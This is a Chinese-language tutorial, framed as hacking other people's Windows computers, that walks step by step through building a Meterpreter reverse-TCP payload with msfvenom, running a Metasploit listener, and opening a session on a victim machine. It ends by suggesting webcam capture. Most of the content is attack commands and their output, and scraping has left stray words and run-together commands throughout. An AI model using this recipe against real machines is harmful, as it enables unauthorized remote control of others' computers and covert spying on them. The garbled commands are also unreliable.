kali linux 黑别人电脑,如何使用 Kali Linux 黑掉 Windows

Kali Linux 派生自 Debian Linux，主要用于渗透测试，拥有超过 300 个的预安装好的渗透测试工具。Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台，Metasploit 是一个用于开发和执行安全利用代码(security exploit)的工具。让咱们来使用 Kali Linux 来攻破 Windows 吧。请注意，我写这篇文章只是出于教育目的哦——一切所以带来的后果和本文做者、译者无关。web

源机器详情

Kali Linuxc#

root@kali:/#uname-a

Linuxkali4.6.0-kali1-amd64#1SMPDebian4.6.4-1kali1(2016-07-21)x86_64 GNU/Linux

root@kali:/#

用作攻击对象的目标机器：windows

Windows7UltimateSP1

步骤 1：建立 Payload 程序

Payload 是一个相似于病毒或者木马的程序，能够运行在远程目标上 —— 为了黑掉那台机器。能够经过如下命令来建立 Payload(program.exe)，以便能使用 Kali Linux 黑掉 Windows。api

root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128LPORT=4444--format=exe-o/root/program.exe

Noplatform was selected,choosingMsf::Module::Platform::Windowsfromthe payload

NoArchselected,selectingArch:x86fromthe payload

Noencoderorbadchars specified,outputting raw payload

Payloadsize:333bytes

Finalsizeof exefile:73802bytes

Savedas:/root/program.exe

root@kali:/# ls -la /root/program.exe

-rw-r--r--1root root73802Jan2600:46/root/program.exe

经过 ls 命令，咱们能够确认 Payload 程序是否成功生成在指定的位置。安全

步骤 2：运行 mfsconsole 命令启动 msf 命令窗口

root@kali:#msfconsole

.,,..

.\$$$$$L..,,==aaccaacc%#s$b.d8,d8P

d8P#$$$$$$$$$$$$$$$$$$$$$$$$$$$b.`BP d888888p

d888888P '7$$$$\""""''^^`` .7$$$|D*"'```?88'

d8bd8b.d8p d8888b ?88'd888b8b _.os#$|8*"` d8P ?8b 88P

88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b

d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b

d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88'?88?8888bd88 d88

.a#$$$$$$"` 88b d8P 88b`?8888P'

,s$$$$$$$"` 888888P' 88n _.,,,ass;:

.a$$$$$$$P`d88P' .,.ass%#S$$$$$$$$$$$$$$'

.a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'

,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'

.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'

_______________________________________________________________ ,&$$$$$$'_____

ll&&$$$$'

.;;lll&&&&'

...;;lllll&'

......;;;llll;;;....

` ......;;;;... . .

Taking notes in notepad? Have Metasploit Pro track & report

your progress and findings -- learn more on http://rapid7.com/metasploit

=[ metasploit v4.12.22-dev ]

+ -- --=[ 1577 exploits - 906 auxiliary - 272 post ]

+ -- --=[ 455 payloads - 39 encoders - 8 nops ]

+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

步骤 3：进行漏洞利用的细节

4444 端口：你能够按照本身的想法来选择使用哪一个端口

LHOST IP：表示 Kali Linux 机器的 IP，这里是 192.168.189.128。 使用以下命令来查看你的 Kali Linux 机器的 IP。

root@kali:/#ipr l

192.168.189.0/24dev eth0 proto kernel scopelinksrc192.168.189.128metric100

root@kali:/#

如今在 msf 命令窗口使用 use exploit/multi/handler 命令，以下：网络

msf>useexploit/multi/handler

msf exploit(handler)>

而后在接下来的命令窗口中使用命令 set payload windows/meterpreter/reverse_tcp：session

msf exploit(handler)>setpayload windows/meterpreter/reverse_tcp

payload=>windows/meterpreter/reverse_tcp

如今使用 LHOST 和 LPORT 来设置本地 IP 和本地端口，以下：框架

msf exploit(handler)>setlhost192.168.189.128

lhost=>192.168.189.128

msf exploit(handler)>setlport4444

lport=>4444

最后使用 exploit 命令。tcp

msf exploit(handler)>exploit

[*]Startedreverse TCP handler on192.168.189.128:4444

[*]Startingthe payload handler...

如今你须要在 Windows 上运行 program.exe，一旦它在目标机器上执行，你就能够创建一个 meterpreter 会话。输入 sysinfo 就能够获得这台被黑掉的 Windows 机器的详情。工具

msf exploit(handler)>exploit

[*]Startedreverse TCP handler on192.168.189.128:4444

[*]Startingthe payload handler...

[*]Sendingstage(957999bytes)to192.168.189.1

[*]Meterpretersession1opened(192.168.189.128:4444->192.168.189.1:53091)at2017-01-2600:51:31+0000

meterpreter>sysinfo

Computer:MANN-PC

OS:Windows7(Build7601,ServicePack1).

Architecture:x64(CurrentProcessisWOW64)

SystemLanguage:en_IN

Domain:WORKGROUP

LoggedOnUsers:2

Meterpreter:x86/win32

一旦你获得了这些详细信息，就能够作更多的漏洞利用，或者经过 help 命令获取更多信息，以便列出你能够黑掉该系统的全部选项，好比 webcam_snap 命令获取网络摄像头，一样你还可使用其余更多的可用选项。祝你入侵愉快！！！！ ←_←